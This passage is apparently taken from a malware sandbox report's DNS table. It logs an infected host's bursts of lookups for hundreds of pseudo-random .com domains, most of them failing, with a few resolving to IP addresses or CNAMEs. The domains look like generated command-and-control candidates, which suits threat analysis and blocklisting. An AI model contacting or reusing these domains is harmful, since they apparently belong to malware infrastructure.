                                                                                                                                                                                                            Nov 11, 2024 18:25:54.198004007 CET192.168.2.101.1.1.10xe866Standard query (0)lyryfyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.198312044 CET192.168.2.101.1.1.10x30bcStandard query (0)vonypom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.198354006 CET192.168.2.101.1.1.10xf23bStandard query (0)puvyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.198662996 CET192.168.2.101.1.1.10xf310Standard query (0)gahyqah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.198848963 CET192.168.2.101.1.1.10xcb45Standard query (0)vojyqem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.199157953 CET192.168.2.101.1.1.10xa6d9Standard query (0)vocyzit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.199181080 CET192.168.2.101.1.1.10xe37Standard query (0)lyxylux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.209047079 CET192.168.2.101.1.1.10xadd6Standard query (0)lymyxid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.209069014 CET192.168.2.101.1.1.10xf3bcStandard query (0)pujyjav.comA (IP address)IN (0x0001)false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.641140938 CET1.1.1.1192.168.2.100xa2c6No error (0)gatyfus.com178.162.217.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.641140938 CET1.1.1.1192.168.2.100xa2c6No error (0)gatyfus.com5.79.71.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.641140938 CET1.1.1.1192.168.2.100xa2c6No error (0)gatyfus.com5.79.71.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.641140938 CET1.1.1.1192.168.2.100xa2c6No error (0)gatyfus.com85.17.31.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.641140938 CET1.1.1.1192.168.2.100xa2c6No error (0)gatyfus.com85.17.31.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.029026031 CET1.1.1.1192.168.2.100x6ebName error (3)qegynuv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.031357050 CET1.1.1.1192.168.2.100x4654No error (0)pupydeq.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.031357050 CET1.1.1.1192.168.2.100x4654No error (0)pupydeq.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.032268047 CET1.1.1.1192.168.2.100xe9ddName error (3)puvylyg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.035166025 CET1.1.1.1192.168.2.100x8773Name error (3)pujymip.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.035860062 CET1.1.1.1192.168.2.100x8cf2Name error (3)vopydek.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.037343979 CET1.1.1.1192.168.2.100xf944Name error (3)lykymox.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.037355900 CET1.1.1.1192.168.2.100x132cName error (3)qetysal.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.041079044 CET1.1.1.1192.168.2.100xe8a5Name error (3)gatydaw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.041093111 CET1.1.1.1192.168.2.100x969cName error (3)vojymic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.044362068 CET1.1.1.1192.168.2.100xab7bName error (3)volymum.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.047272921 CET1.1.1.1192.168.2.100x2b49Name error (3)lyvylyn.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.054326057 CET1.1.1.1192.168.2.100x593aName error (3)lymylyr.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.054410934 CET1.1.1.1192.168.2.100x2b6aName error (3)vocykem.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.058485985 CET1.1.1.1192.168.2.100x8097Name error (3)qebylug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.059211969 CET1.1.1.1192.168.2.100x3efaName error (3)gahynus.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.062494993 CET1.1.1.1192.168.2.100x3510Name error (3)ganyzub.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.066076994 CET1.1.1.1192.168.2.100xb397Name error (3)pujygul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.079809904 CET1.1.1.1192.168.2.100x2d2eName error (3)gadydas.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.092117071 CET1.1.1.1192.168.2.100xd055Name error (3)puzymig.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.107009888 CET1.1.1.1192.168.2.100x5411Name error (3)vofydac.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.107024908 CET1.1.1.1192.168.2.100x8d41Name error (3)qeqylyl.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.109112978 CET1.1.1.1192.168.2.100xe0aeName error (3)qexyqog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.122375011 CET1.1.1.1192.168.2.100x8a50Name error (3)qegyfyp.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.125268936 CET1.1.1.1192.168.2.100xf91fName error (3)gahyfyz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.129828930 CET1.1.1.1192.168.2.100x4777Name error (3)lyvywed.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.130937099 CET1.1.1.1192.168.2.100x6551Name error (3)qexykaq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.131037951 CET1.1.1.1192.168.2.100x2b8bName error (3)pufybyv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.131140947 CET1.1.1.1192.168.2.100xc95bName error (3)galyhiw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.131594896 CET1.1.1.1192.168.2.100x66aeName error (3)vopycom.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.131696939 CET1.1.1.1192.168.2.100x757cName error (3)qebyrev.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.133153915 CET1.1.1.1192.168.2.100x2ba7Name error (3)lykygur.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.142199039 CET1.1.1.1192.168.2.100x65d2Name error (3)qekyhil.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.145517111 CET1.1.1.1192.168.2.100x11bName error (3)puvywav.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.146626949 CET1.1.1.1192.168.2.100x1ac7Name error (3)qetyxiq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.146724939 CET1.1.1.1192.168.2.100xd5e9Name error (3)pufydep.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.146790981 CET1.1.1.1192.168.2.100xccdeName error (3)lyxyjaj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.147099972 CET1.1.1.1192.168.2.100xa1ffName error (3)vowyzuk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.148010969 CET1.1.1.1192.168.2.100x3b84Name error (3)vowypit.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.149802923 CET1.1.1.1192.168.2.100x93e8Name error (3)puzyjoq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.149921894 CET1.1.1.1192.168.2.100xf575Name error (3)pumytup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.150991917 CET1.1.1.1192.168.2.100xd433Name error (3)vofybyf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.151137114 CET1.1.1.1192.168.2.100xcda3Name error (3)puryxuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.151597977 CET1.1.1.1192.168.2.100x2490Name error (3)vonyryc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.152211905 CET1.1.1.1192.168.2.100xb792Name error (3)gatycoh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.152224064 CET1.1.1.1192.168.2.100xd034Name error (3)vocyqaf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.152506113 CET1.1.1.1192.168.2.100x6d83Name error (3)lygyfex.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.152654886 CET1.1.1.1192.168.2.100x1683Name error (3)gaqypiz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.158490896 CET1.1.1.1192.168.2.100xf9bcName error (3)purypol.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.159302950 CET1.1.1.1192.168.2.100xcb28Name error (3)ganyrys.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.159332991 CET1.1.1.1192.168.2.100x4c7bName error (3)qeqytup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.160274029 CET1.1.1.1192.168.2.100x6216Name error (3)gaqyzuw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.160717964 CET1.1.1.1192.168.2.100xebecName error (3)volyjok.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.161056042 CET1.1.1.1192.168.2.100xcb7eName error (3)gadyveb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.162412882 CET1.1.1.1192.168.2.100x3585Name error (3)gacykeh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.162538052 CET1.1.1.1192.168.2.100xecb9Name error (3)lymytux.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.162549973 CET1.1.1.1192.168.2.100xfc3dName error (3)qedyveg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.163708925 CET1.1.1.1192.168.2.100xda94No error (0)lysyvan.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.163708925 CET1.1.1.1192.168.2.100xda94No error (0)lysyvan.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.167922020 CET1.1.1.1192.168.2.100x7c8dName error (3)vojygut.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.169775963 CET1.1.1.1192.168.2.100x193fName error (3)gacyqob.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.172183037 CET1.1.1.1192.168.2.100xd15bName error (3)lyryxij.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.315819979 CET1.1.1.1192.168.2.100x5e53No error (0)pupycag.com18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.337265968 CET1.1.1.1192.168.2.100x5adNo error (0)lygynud.com3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.799722910 CET1.1.1.1192.168.2.100x23No error (0)lyrysor.comzz1985.qu200.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.799722910 CET1.1.1.1192.168.2.100x23No error (0)zz1985.qu200.comgtm-sg-6l13ukk0m05.qu200.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.799722910 CET1.1.1.1192.168.2.100x23No error (0)gtm-sg-6l13ukk0m05.qu200.com103.150.10.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.006978989 CET1.1.1.1192.168.2.100x88beName error (3)gaqykab.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.007875919 CET1.1.1.1192.168.2.100x55cfName error (3)qexynyp.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.019642115 CET1.1.1.1192.168.2.100x1b92Name error (3)qegysoq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.026546001 CET1.1.1.1192.168.2.100xbebaName error (3)vocymut.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.032186031 CET1.1.1.1192.168.2.100x24faName error (3)vowykaf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.039138079 CET1.1.1.1192.168.2.100x2832Name error (3)gacynuz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.044717073 CET1.1.1.1192.168.2.100x3ccName error (3)lyryled.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.056159973 CET1.1.1.1192.168.2.100x14fdName error (3)purylev.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.058343887 CET1.1.1.1192.168.2.100x212fName error (3)vojydam.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.061405897 CET1.1.1.1192.168.2.100x3eb5Name error (3)puvymul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.061413050 CET1.1.1.1192.168.2.100x27a7Name error (3)pupyxup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.074142933 CET1.1.1.1192.168.2.100x898aName error (3)lykynyj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.316783905 CET1.1.1.1192.168.2.100xad0cName error (3)vofyzym.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.317318916 CET1.1.1.1192.168.2.100x78ebName error (3)puvygyq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.317827940 CET1.1.1.1192.168.2.100xd93aName error (3)pupytyl.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.318344116 CET1.1.1.1192.168.2.100x11d5Name error (3)purywop.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.318579912 CET1.1.1.1192.168.2.100x40eaName error (3)lykysix.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.321132898 CET1.1.1.1192.168.2.100xa1faName error (3)lyryjir.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.322340965 CET1.1.1.1192.168.2.100x67a2Name error (3)galydoz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.331291914 CET1.1.1.1192.168.2.100xd3f0Name error (3)gacyvah.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.803086042 CET1.1.1.1192.168.2.100x433Name error (3)lyvyvix.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.804059982 CET1.1.1.1192.168.2.100x6cc2Name error (3)qekytyq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.808228970 CET1.1.1.1192.168.2.100xed21Name error (3)pupyjuv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.823360920 CET1.1.1.1192.168.2.100xeName error (3)qedykiv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.826235056 CET1.1.1.1192.168.2.100xb035Name error (3)vojyrak.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.830894947 CET1.1.1.1192.168.2.100x3d1cName error (3)vonybat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.835359097 CET1.1.1.1192.168.2.100xe0f0Name error (3)qebyvop.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.849617004 CET1.1.1.1192.168.2.100x72adName error (3)galypyh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.855174065 CET1.1.1.1192.168.2.100x10fdName error (3)ganyvoz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.857920885 CET1.1.1.1192.168.2.100xa636No error (0)qetyhyg.com64.225.91.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.859272957 CET1.1.1.1192.168.2.100x33b7Name error (3)gaqynyw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.860065937 CET1.1.1.1192.168.2.100x7d3fName error (3)qeqyhup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.861140013 CET1.1.1.1192.168.2.100x8172Name error (3)pufylap.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.864685059 CET1.1.1.1192.168.2.100xa005Name error (3)vowymyk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.866884947 CET1.1.1.1192.168.2.100xd123Name error (3)pumybal.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.868424892 CET1.1.1.1192.168.2.100x448bName error (3)qedyrag.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.869327068 CET1.1.1.1192.168.2.100x8431Name error (3)lysyjid.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.871582031 CET1.1.1.1192.168.2.100x8994Name error (3)lygytyd.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.871843100 CET1.1.1.1192.168.2.100x2bd6Name error (3)gatyqih.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.875761032 CET1.1.1.1192.168.2.100x1f6dName error (3)pufytev.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.877620935 CET1.1.1.1192.168.2.100xd7b1Name error (3)pujyxyl.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.881808996 CET1.1.1.1192.168.2.100x736aName error (3)lymyner.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.884151936 CET1.1.1.1192.168.2.100xdb77Name error (3)vonygec.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.885544062 CET1.1.1.1192.168.2.100x9507Name error (3)gadykos.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.885858059 CET1.1.1.1192.168.2.100x5703Name error (3)pupywog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.885948896 CET1.1.1.1192.168.2.100x8fadName error (3)galycuw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.885960102 CET1.1.1.1192.168.2.100x3ad1Name error (3)lymygyx.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.886076927 CET1.1.1.1192.168.2.100x831dName error (3)vowyjut.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.886460066 CET1.1.1.1192.168.2.100x4d20Name error (3)volycik.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.886589050 CET1.1.1.1192.168.2.100x7631Name error (3)lysywon.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.888823986 CET1.1.1.1192.168.2.100xee68Name error (3)vofyref.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.890717030 CET1.1.1.1192.168.2.100xe246Name error (3)puzypug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.891196012 CET1.1.1.1192.168.2.100xe7e4Name error (3)gadyrab.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.893877983 CET1.1.1.1192.168.2.100xe564Name error (3)qegylep.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.905029058 CET1.1.1.1192.168.2.100xb873Name error (3)puvycip.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.909426928 CET1.1.1.1192.168.2.100xaf69Name error (3)ganyfes.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.909974098 CET1.1.1.1192.168.2.100x99b8Name error (3)puzyciq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.916440964 CET1.1.1.1192.168.2.100x3da9Name error (3)lykyxur.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.918410063 CET1.1.1.1192.168.2.100x8556Name error (3)vopyjuf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.918992996 CET1.1.1.1192.168.2.100xaed1Name error (3)vofykoc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.920689106 CET1.1.1.1192.168.2.100x1726Name error (3)gaqyhuz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.920825005 CET1.1.1.1192.168.2.100xca98Name error (3)lyvyfad.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.921278000 CET1.1.1.1192.168.2.100xd03aName error (3)gacydib.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.921406031 CET1.1.1.1192.168.2.100x4195Name error (3)qebyfav.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.921603918 CET1.1.1.1192.168.2.100xb627Name error (3)qekyxul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.921768904 CET1.1.1.1192.168.2.100x4272Name error (3)puvydov.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.921966076 CET1.1.1.1192.168.2.100x9bbcName error (3)lykytej.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.922508955 CET1.1.1.1192.168.2.100x73e7Name error (3)vocydof.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.922758102 CET1.1.1.1192.168.2.100xcd11Name error (3)purymuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.925961018 CET1.1.1.1192.168.2.100x3a98Name error (3)lygylax.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.926203966 CET1.1.1.1192.168.2.100x7303Name error (3)volypum.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.940116882 CET1.1.1.1192.168.2.100x3a50Name error (3)pujyteq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.940342903 CET1.1.1.1192.168.2.100xc399Name error (3)pumygyp.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.940591097 CET1.1.1.1192.168.2.100xfef7Name error (3)vopyqim.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.941350937 CET1.1.1.1192.168.2.100x8459Name error (3)gahyzez.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.941497087 CET1.1.1.1192.168.2.100xe9e9Name error (3)qetyquq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.941538095 CET1.1.1.1192.168.2.100xdfecName error (3)lyxyvoj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.942394972 CET1.1.1.1192.168.2.100x66c8Name error (3)lyrymuj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.942406893 CET1.1.1.1192.168.2.100xe8bcName error (3)qexysig.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.948184013 CET1.1.1.1192.168.2.100x9627Name error (3)qexyvoq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.948601961 CET1.1.1.1192.168.2.100x1c9cName error (3)lyxysun.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.949304104 CET1.1.1.1192.168.2.100x8e4aName error (3)qeqynel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:20.017560005 CET1.1.1.1192.168.2.100xe885No error (0)gatyhub.compltraffic7.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:20.017560005 CET1.1.1.1192.168.2.100xe885No error (0)pltraffic7.com72.52.179.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.142802954 CET1.1.1.1192.168.2.100xb143Name error (3)volyrac.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.154737949 CET1.1.1.1192.168.2.100x6848Name error (3)pumycug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.160386086 CET1.1.1.1192.168.2.100x4ab2Name error (3)lykywid.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.162380934 CET1.1.1.1192.168.2.100xdd90Name error (3)puzytap.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.162390947 CET1.1.1.1192.168.2.100x3903Name error (3)qeqyvig.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.163499117 CET1.1.1.1192.168.2.100xd9bName error (3)gadyhyw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.167891979 CET1.1.1.1192.168.2.100xca90Name error (3)vonycum.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.171205044 CET1.1.1.1192.168.2.100xa41cName error (3)gaqyvob.comnonenoneA (IP address)IN (0x0001)false
